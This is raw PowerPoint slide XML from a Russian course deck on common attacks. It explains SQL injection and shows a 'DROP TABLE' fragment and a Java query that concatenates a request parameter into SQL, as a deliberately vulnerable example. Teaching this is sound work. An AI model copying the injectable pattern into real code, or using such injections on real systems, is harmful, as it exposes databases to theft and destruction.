            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Образец заголовка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Текст 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342704" y="1901824"/>
            <a:ext cx="10824249" cy="4048125"/>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9804400" y="6180985"/>
            <a:ext cx="2044896" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>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206022157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5" r:id="rId4"/>
    <p:sldLayoutId id="2147483676" r:id="rId5"/>
    <p:sldLayoutId id="2147483668" r:id="rId6"/>
    <p:sldLayoutId id="2147483672" r:id="rId7"/>
    <p:sldLayoutId id="2147483653" r:id="rId8"/>
    <p:sldLayoutId id="2147483654" r:id="rId9"/>
    <p:sldLayoutId id="2147483655" r:id="rId10"/>
    <p:sldLayoutId id="2147483656" r:id="rId11"/>
    <p:sldLayoutId id="2147483664" r:id="rId12"/>
    <p:sldLayoutId id="2147483657" r:id="rId13"/>
    <p:sldLayoutId id="2147483660" r:id="rId14"/>
    <p:sldLayoutId id="2147483658" r:id="rId15"/>
    <p:sldLayoutId id="2147483674" r:id="rId16"/>
    <p:sldLayoutId id="2147483673" r:id="rId17"/>
    <p:sldLayoutId id="2147483678" r:id="rId18"/>
    <p:sldLayoutId id="2147483667" r:id="rId19"/>
    <p:sldLayoutId id="2147483661" r:id="rId20"/>
    <p:sldLayoutId id="2147483662" r:id="rId21"/>
    <p:sldLayoutId id="2147483663" r:id="rId22"/>
    <p:sldLayoutId id="2147483659" r:id="rId23"/>
    <p:sldLayoutId id="2147483666" r:id="rId24"/>
    <p:sldLayoutId id="2147483677" r:id="rId25"/>
    <p:sldLayoutId id="2147483679" r:id="rId26"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" ftr="0" dt="0"/>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8"/>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userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3228" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="4452" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="2978" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="1753" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="1504" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="7401" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="6176" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="5927" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="4702" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="1003" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="3748" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="278" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14"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chart" Target="../charts/chart5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart4.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.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28.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svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.svg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.svg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.svg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.svg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.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svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.svg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.svg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.sv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svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.svg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.svg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.svg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.svg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.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D27EAA-15D9-495C-9CF5-5CC8AA9E4738}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241105" y="879928"/>
            <a:ext cx="5854895" cy="1910443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Основные атаки и паттерны </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56479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4D217EC6-9A24-8520-00D7-6CA418FB8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1592262"/>
            <a:ext cx="11330893" cy="348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Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDFF8DEA-DDBC-45C1-9C39-35C4B6CCC3D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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EBF4832-7BE9-4D23-A746-39354FD436E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800"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DROP TABLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218517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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2D0038-3968-BE80-1AFD-3C7241AA6517}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3B5CA0C3-2E3F-4C16-8F43-1643E3AA67E7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Рисунок 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C83066F4-2072-9D80-C011-56C8E09223FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411116" y="1502229"/>
            <a:ext cx="6747638" cy="3994006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9392064-8220-4C81-9CC1-098431594EAE}"/>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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBD63A9E-DAE7-407A-8259-4EE17C3EF5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554685" y="1375573"/>
            <a:ext cx="3788229" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-инъекции</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> — это разновидность атаки на веб-приложения. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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В ходе проведения такой атаки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>делается попытка модификация SQL-выражения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>, которое приложение отправляет базе данных. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Выполняется атака путём подстановки особым образом подготовленных данных в поля ввода, которые может заполнять пользователь.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B3F330-A098-49D4-95F0-00D2ACD6F3E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="310757"/>
            <a:ext cx="7416800"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SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400"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50137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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282AC9F3-BC02-4AF2-83F4-DCFF63BB14AA}"/>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ru-RU" sz="1200" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{281DCB6C-1572-42BD-9898-71323902F1AC}"/>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Пример </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Рисунок 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF3ED2A-C65B-47F8-9610-9D9FB80639EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2387600" y="1129030"/>
            <a:ext cx="7416800" cy="4820920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32465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6EC203-BB63-C75A-585E-02F3983532DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442912" y="4086655"/>
            <a:ext cx="10549553" cy="1660516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>account_balance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>user_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>             + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>customerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>connection.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
